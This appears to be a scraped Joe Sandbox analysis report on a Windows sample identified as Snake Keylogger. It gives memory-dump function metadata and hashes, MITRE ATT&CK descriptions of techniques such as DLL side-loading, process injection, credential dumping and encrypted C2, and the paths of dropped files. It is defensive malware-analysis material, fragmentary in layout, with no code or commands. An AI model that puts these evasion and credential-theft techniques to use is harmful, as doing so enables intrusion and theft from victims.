Instruction ID: 2aefc052567e15b2308725f69f1eaa6d353d09b7bb72ef3dc344932916ab499f
Opcode Fuzzy Hash: 7999f378a531f353a17c593dc27c8c412c4b9f990c3324228f326676d95b1222
Instruction Fuzzy Hash: BED0C2340083850FC702F378A9902647B2DEAC2304F4011E5E8044D11AEF6849894391

Function 032C5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a21315aa357b98128e4a31eba13d53bc66869516ec1f4eae58055d46b4837b
Instruction ID: 5ecee0ddbc1839dc2eddd3fd61ef867e78ed736ddd79b833b1d8c73003da8377
Opcode Fuzzy Hash: 62a21315aa357b98128e4a31eba13d53bc66869516ec1f4eae58055d46b4837b
Instruction Fuzzy Hash: 3AC012341443094FC505F779EA85665B71EE6C0300F405560A5090E229DF7C5C8847D0

Non-executed Functions

Function 032C3572 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Xbq, xrefs: 032C35AF
$^q, xrefs: 032C3596

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: feb406fe615ce4c36dcede2853908642288159306eab283228884b7e07a4ecad
Instruction ID: 7bf1b43a00ef4937e5a5bd41cda0249fbe1f2338a0001188e5fef9ff5d5ac5ac
Opcode Fuzzy Hash: feb406fe615ce4c36dcede2853908642288159306eab283228884b7e07a4ecad
Instruction Fuzzy Hash: B4919A74F212989BDB58EB78945427EB7B7BFC4710B04CA1DD546D7388CE388842C796

Function 032CE388 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5vq, xrefs: 032CE4A3

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 391360bc8fab2667aaf63b2ba2261e4e09729171b96fc0a375b5e6742832dbfe
Instruction ID: e6daf04cf75112ad90a2bba2dc2a9f77dd118e632cbd6c4860e24c6fe18d0453
Opcode Fuzzy Hash: 391360bc8fab2667aaf63b2ba2261e4e09729171b96fc0a375b5e6742832dbfe
Instruction Fuzzy Hash: D5529A74E11268CFDB64DF69C884B9DBBB2BB89301F1085EAD409AB254DB359EC1CF50

Function 032CE379 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

.5vq, xrefs: 032CE4A3

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: .5vq
API String ID: 0-493797296
Opcode ID: 3d944854dac4da81ad983348cf311bf4c036a53403e12d28badb6c33abd2b402
Instruction ID: 8cca08404e7916243a8eb4ff06cf5d5ac4768af1206196cd933f67a9bd593c16
Opcode Fuzzy Hash: 3d944854dac4da81ad983348cf311bf4c036a53403e12d28badb6c33abd2b402
Instruction Fuzzy Hash: 8861A574E01219CFDB28DF66D980BADBBB6BB88300F10C5A9D40967364DB359D85DF40

Function 032CE9BB Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb97f53699a57167a115a9b3bc10d4f1e9a3db522512f52e5d3626080dcc849
Instruction ID: e058647122e3a7f47305e6c8ad449c1be916073ebbceb18d04d745c29c9b4749
Opcode Fuzzy Hash: fcb97f53699a57167a115a9b3bc10d4f1e9a3db522512f52e5d3626080dcc849
Instruction Fuzzy Hash: 30A18B74A11268CFDB64DF24C994BAABBB2BF49301F1085EAD40EA7254DB319EC1CF51

Function 032CEB9B Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d6911978a734424ff59ce83ff77733a221c75522d232e2841a075c27498254
Instruction ID: 4f1bd160c51cd74b6f2ba21bdd2b10bd866e084ad0da142d4c7894e1f65a1260
Opcode Fuzzy Hash: f1d6911978a734424ff59ce83ff77733a221c75522d232e2841a075c27498254
Instruction Fuzzy Hash: 8F519F74A11228CFCB65DF24C894BAAB7B2BF4A301F5085E9D40EA7354DB319E81CF41

Function 032C21E2 Relevance: 5.1, Strings: 4, Instructions: 92COMMON

Download Yara Rule

Strings

Xbq, xrefs: 032C220E
Xbq, xrefs: 032C2248
Xbq, xrefs: 032C22C7
Xbq, xrefs: 032C2314

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 341ceacda132a314e743ec7ae4bf4e4463107ab1ae53d2e89d45bd485ba41d34
Instruction ID: 53dfbfdbe72b9dec8f9472f5726acb9628bf92b7bcc6cddff7592cb9945c2e0f
Opcode Fuzzy Hash: 341ceacda132a314e743ec7ae4bf4e4463107ab1ae53d2e89d45bd485ba41d34
Instruction Fuzzy Hash: 0C315231D3035ECBDF64CB69C5807AEB6B6AB89300F184AADC405A7254DF70C9C1CB92

Function 032C6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 032C60BA
\;^q, xrefs: 032C6094
\;^q, xrefs: 032C60C6
\;^q, xrefs: 032C609E

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: a422a3cdeed9a04fc3f97311c399f612a2424acf20b8f111c2f8e4197c9fdcda
Instruction ID: 23646c57d3bd5042ef76bf4d0cc7f84606b65ab49df5420b415c0ce8df9f6bc3
Opcode Fuzzy Hash: a422a3cdeed9a04fc3f97311c399f612a2424acf20b8f111c2f8e4197c9fdcda
Instruction Fuzzy Hash: 4C019E317700559FCB24CA2CC44492577EBBF88A6031D426EE102DB3B4DBA2DC828741

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report R86BRY7DdC.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\R86BRY7DdC.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Victim_SID[1].bd

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Ebagelog[1].bd

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
R86BRY7DdC.exe

Function 00007FFD9B87166C Relevance: 1.7, APIs: 1, Instructions: 197
filenetworkCOMMON

Function 00007FFD9B87140D Relevance: 1.7, APIs: 1, Instructions: 247
networkCOMMON

Function 00007FFD9B8711DC Relevance: 1.7, APIs: 1, Instructions: 244
networkCOMMON

Function 00007FFD9B876151 Relevance: 1.7, APIs: 1, Instructions: 219
injectionCOMMON

Function 00007FFD9B87635D Relevance: 1.7, APIs: 1, Instructions: 192
COMMON

Function 00007FFD9B87599B Relevance: 1.7, APIs: 1, Instructions: 191
processCOMMON

Function 00007FFD9B875FAC Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Function 00007FFD9B875CCC Relevance: 1.7, APIs: 1, Instructions: 164
threadCOMMON

Function 00007FFD9B875E49 Relevance: 1.6, APIs: 1, Instructions: 139
threadCOMMON